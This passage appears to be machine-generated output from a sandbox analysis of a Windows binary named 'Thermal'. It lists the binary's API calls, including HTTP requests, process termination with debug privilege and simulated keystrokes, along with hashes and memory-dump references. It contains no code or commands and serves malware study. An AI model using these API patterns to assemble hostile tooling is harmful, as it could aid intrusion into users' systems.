                                                      • Instruction Fuzzy Hash: C8519B74508345AFDB00EF54DC99F6E7BE1FBA8310F004919F5558B2E1CB70A995CB91
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0019211C
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00192148
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0019218A
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0019219F
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001921AC
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001921DC
                                                      • InternetCloseHandle.WININET(00000000), ref: 00192223
                                                        • Part of subcall function 00192B4F: GetLastError.KERNEL32(?,?,00191EE3,00000000,00000000,00000001), ref: 00192B64
                                                        • Part of subcall function 00192B4F: SetEvent.KERNEL32(?,?,00191EE3,00000000,00000000,00000001), ref: 00192B79
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                      • String ID:
                                                      • API String ID: 2603140658-3916222277
                                                      • Opcode ID: 3687c6b7d0c3d47ae5bcc35c6be51fa5596432a2e55d7ac580c6fccfb2d56962
                                                      • Instruction ID: 93ea2eadd3c446a2bb666123e2f15fa5635611742b6240689ccd1c0c9f73c0c8
                                                      • Opcode Fuzzy Hash: 3687c6b7d0c3d47ae5bcc35c6be51fa5596432a2e55d7ac580c6fccfb2d56962
                                                      • Instruction Fuzzy Hash: 71417CB1541208BFEF169F50CC89FBB7BACFF08354F104116FA059A151DB749E548BA0
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,001B0980), ref: 00199412
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,001B0980), ref: 00199446
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001995C0
                                                      • SysFreeString.OLEAUT32(?), ref: 001995EA
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      • Opcode ID: 2ede44d058f75dcdad790404a347fd927667aba0d6fb451d8b5d4df3899680ea
                                                      • Instruction ID: ab6e838ada6fca6fac3ee794f6e803ccd69e4aa255eb6d87b844cf7160e3b74b
                                                      • Opcode Fuzzy Hash: 2ede44d058f75dcdad790404a347fd927667aba0d6fb451d8b5d4df3899680ea
                                                      • Instruction Fuzzy Hash: A9F13A71A00219EFDF15DFA8C884EAEB7B9FF49315F118059F506AB250DB31AE45CB50
                                                      APIs
                                                        • Part of subcall function 00184BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00183B8A,?), ref: 00184BE0
                                                        • Part of subcall function 00184BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00183B8A,?), ref: 00184BF9
                                                        • Part of subcall function 00184FEC: GetFileAttributesW.KERNEL32(?,00183BFE), ref: 00184FED
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 001852FB
                                                      • _wcscmp.LIBCMT ref: 00185315
                                                      • MoveFileW.KERNEL32(?,?), ref: 00185330
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      • Opcode ID: 2255b2574e78fd6dcbe4f1a0c03fcc72b920c2bf66d429e52bd5af10e345b3b3
                                                      • Instruction ID: 7fd221daf56471a56109617e95fd7d167582970040398c89af6cddea2974fe2d
                                                      • Opcode Fuzzy Hash: 2255b2574e78fd6dcbe4f1a0c03fcc72b920c2bf66d429e52bd5af10e345b3b3
                                                      • Instruction Fuzzy Hash: 4A5185B20087859BC764EBA0D8819DFB7EDEF94301F50491EF589D3152EF34A688CB66
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001A8D24
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: 4f9f224b3fde36b38f2781848d2571981c1b20615bc5d4452060f1af1d9906bc
                                                      • Instruction ID: 7276201c3cbda404101a810fe322642e10205c22fca394824ae73ca5d6ae0974
                                                      • Opcode Fuzzy Hash: 4f9f224b3fde36b38f2781848d2571981c1b20615bc5d4452060f1af1d9906bc
                                                      • Instruction Fuzzy Hash: 3651D039640204FFEF359F68CC89B9D7B64AB16360F240511FA15EB1E1CF71A990CB60
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0015C638
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0015C65A
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0015C672
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0015C690
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0015C6B1
                                                      • DestroyIcon.USER32(00000000), ref: 0015C6C0
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0015C6DD
                                                      • DestroyIcon.USER32(?), ref: 0015C6EC
                                                        • Part of subcall function 001AAAD4: DeleteObject.GDI32(00000000), ref: 001AAB0D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                      • String ID:
                                                      • API String ID: 2819616528-0
                                                      • Opcode ID: 31b6d6f45826bc39e2af48c2fa385f62d9ad89f90ea989054a4cce15697aa09c
                                                      • Instruction ID: d9206994398b363852e79355ef26d60e04cb54ea8ec96730cb621e56e7d262eb
                                                      • Opcode Fuzzy Hash: 31b6d6f45826bc39e2af48c2fa385f62d9ad89f90ea989054a4cce15697aa09c
                                                      • Instruction Fuzzy Hash: 49515870600309EFDB24DF24ED85BAE7BB5EB58711F104618F952AB690DB70EDA0DB90
                                                      APIs
                                                        • Part of subcall function 0017B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0017B54D
                                                        • Part of subcall function 0017B52D: GetCurrentThreadId.KERNEL32 ref: 0017B554
                                                        • Part of subcall function 0017B52D: AttachThreadInput.USER32(00000000,?,0017A23B,?,00000001), ref: 0017B55B
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0017A246
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0017A263
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0017A266
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0017A26F
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0017A28D
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0017A290
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0017A299
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0017A2B0
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0017A2B3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: c59d2b03cae91e384529fc35a71f80e289ef062a470742dfad91d34faacb871f
                                                      • Instruction ID: ca8c7ccbd9ef86b493d7ded813be04ff35188d40587933b8e292003e59d5447a
                                                      • Opcode Fuzzy Hash: c59d2b03cae91e384529fc35a71f80e289ef062a470742dfad91d34faacb871f
                                                      • Instruction Fuzzy Hash: 8F11CEB1950218BEF6116B64DC8AFAB3B2DEB8C790F514519F7446B0D0CBF29C909AA4
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0017915A,00000B00,?,?), ref: 001794E2
                                                      • HeapAlloc.KERNEL32(00000000,?,0017915A,00000B00,?,?), ref: 001794E9
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0017915A,00000B00,?,?), ref: 001794FE
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0017915A,00000B00,?,?), ref: 00179506
                                                      • DuplicateHandle.KERNEL32(00000000,?,0017915A,00000B00,?,?), ref: 00179509
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0017915A,00000B00,?,?), ref: 00179519
                                                      • GetCurrentProcess.KERNEL32(0017915A,00000000,?,0017915A,00000B00,?,?), ref: 00179521
                                                      • DuplicateHandle.KERNEL32(00000000,?,0017915A,00000B00,?,?), ref: 00179524
                                                      • CreateThread.KERNEL32(00000000,00000000,0017954A,00000000,00000000,00000000), ref: 0017953E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: e819edee2ff19ef1f8bf846eb46c7bb3f94dd6696178388201080c78bbfb212d
                                                      • Instruction ID: 81c498e2569bc85334d9e6719fb4b3704418e3371061a6fa9b6c75f4cedb14f7
                                                      • Opcode Fuzzy Hash: e819edee2ff19ef1f8bf846eb46c7bb3f94dd6696178388201080c78bbfb212d
                                                      • Instruction Fuzzy Hash: 6A01A4B5240308BFE611AFA9DC4DF6B7BACEB89711F008511FA05DB6A1CB71D8448B20
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      • Opcode ID: 3d19429095c17bb1c21a6843eaf113cf1ab775b2f7ec786d1b7271fac508b612
                                                      • Instruction ID: aac4087768cdb8f53f2dc96f11460dcd5e2896570cc0467b8cf151369d7a602a
                                                      • Opcode Fuzzy Hash: 3d19429095c17bb1c21a6843eaf113cf1ab775b2f7ec786d1b7271fac508b612
                                                      • Instruction Fuzzy Hash: 78C1B271A0021A9FDF14DFA8C885AAEB7F5FF48314F558469E905EB280E770ED48CB91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      • Opcode ID: e8cdba7bcefd459ba3d3e82d99005090038fbc30f3ca7601749ddeb98268a301
                                                      • Instruction ID: a0eba5c253293aceeaab4f19465ab4e3bb754a74ebb05764800dcd26d55e44ed
                                                      • Opcode Fuzzy Hash: e8cdba7bcefd459ba3d3e82d99005090038fbc30f3ca7601749ddeb98268a301
                                                      • Instruction Fuzzy Hash: BB918D71A00219AFDF24DFA9C884FAEBBB8EF45714F10855EF515AB290D7709944CFA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001A7449
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 001A745D
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001A7477
                                                      • _wcscat.LIBCMT ref: 001A74D2
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 001A74E9
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001A7517
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: 0e6cdd9c474cad9de2b4c2ba41917deb601c255b28941b61fa292e0796f18596
                                                      • Instruction ID: 2c68b8587cac91625724b16c46b81eb2708b7d6e38b2927e2fea4b62161ecf97
                                                      • Opcode Fuzzy Hash: 0e6cdd9c474cad9de2b4c2ba41917deb601c255b28941b61fa292e0796f18596
                                                      • Instruction Fuzzy Hash: C9417075A04348AFEB219F64CC85FEE7BA8EF09350F10452AF985A72D1D7719E84CB50
                                                      APIs
                                                        • Part of subcall function 00184148: CreateToolhelp32Snapshot.KERNEL32 ref: 0018416D
                                                        • Part of subcall function 00184148: Process32FirstW.KERNEL32(00000000,?), ref: 0018417B
                                                        • Part of subcall function 00184148: CloseHandle.KERNEL32(00000000), ref: 00184245
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019F08D
                                                      • GetLastError.KERNEL32 ref: 0019F0A0
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019F0CF
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0019F14C
                                                      • GetLastError.KERNEL32(00000000), ref: 0019F157
                                                      • CloseHandle.KERNEL32(00000000), ref: 0019F18C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: d4ab3733539ac1cfc0df6ec94679c14749cc490bc3529479bce6e98b39349600
                                                      • Instruction ID: 17cb6b1a6c81f9f4a2466240efb78119a9284ea5c6819e425d9bbd91e6ece2e4
                                                      • Opcode Fuzzy Hash: d4ab3733539ac1cfc0df6ec94679c14749cc490bc3529479bce6e98b39349600
                                                      • Instruction Fuzzy Hash: 2541BE31300201AFDB15EF64DC95F6EB7A5AFA4714F08842DF8069B2D2CB74A945CF95
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 0018357C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 1e2171b877e5a5410ec90f9b17590f06cd3a761cfd2d0fffa84600054a1d526d
                                                      • Instruction ID: 2e7142d7a49e2c642d4c4d752ba628a1c750d01d953c03f6a6844c1a5efa084f
                                                      • Opcode Fuzzy Hash: 1e2171b877e5a5410ec90f9b17590f06cd3a761cfd2d0fffa84600054a1d526d
                                                      • Instruction Fuzzy Hash: BB110A7164C356BEE7056B14ECD2C6A779CDF15F60F24002AFA30A62C1E7A46F405BA0
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00184802
                                                      • LoadStringW.USER32(00000000), ref: 00184809
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0018481F
                                                      • LoadStringW.USER32(00000000), ref: 00184826
                                                      • _wprintf.LIBCMT ref: 0018484C
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0018486A
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00184847
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: ce4bd92175b5f81c4cbb61d4db132e595e6542f176c45aed67a3b5bdaabd2a3c
                                                      • Instruction ID: d6129b11a4600bc257e61ef801a6372a6fdacc3dea4c5d7405cf929f2fd9c90c
                                                      • Opcode Fuzzy Hash: ce4bd92175b5f81c4cbb61d4db132e595e6542f176c45aed67a3b5bdaabd2a3c
                                                      • Instruction Fuzzy Hash: 99014FF29002087FE712E7A49D89EF7736CEB0C300F400695B749E2041EB749E848B75
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • GetSystemMetrics.USER32(0000000F), ref: 001ADB42
                                                      • GetSystemMetrics.USER32(0000000F), ref: 001ADB62
                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 001ADD9D
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001ADDBB
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001ADDDC
                                                      • ShowWindow.USER32(00000003,00000000), ref: 001ADDFB
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 001ADE20
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 001ADE43
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                      • String ID:
                                                      • API String ID: 1211466189-0
                                                      • Opcode ID: 51e9acb5522ad509e89959a6d212fb578cde46c6754594672aa39f8b27782ca0
                                                      • Instruction ID: 50d09d4bf545cbc7895997363bf57e2c4359c2919b21b355c28e7f986c246aa1
                                                      • Opcode Fuzzy Hash: 51e9acb5522ad509e89959a6d212fb578cde46c6754594672aa39f8b27782ca0
                                                      • Instruction Fuzzy Hash: E5B1CB38600615EFDF14CF69D9C57AE7BB1FF05710F088069EC4A9EA99D730A990CBA0
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 001A147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001A040D,?,?), ref: 001A1491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001A044E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3479070676-0
                                                      • Opcode ID: 3fae74e8272d34c7d331adcc0761042aabf7518b46edd87cc43faec9ddfa0271
                                                      • Instruction ID: 7b3db51e5f6647e64b30895e659979c55eb4aa53065bcfdb9c5d74a2eeeb0fcf
                                                      • Opcode Fuzzy Hash: 3fae74e8272d34c7d331adcc0761042aabf7518b46edd87cc43faec9ddfa0271
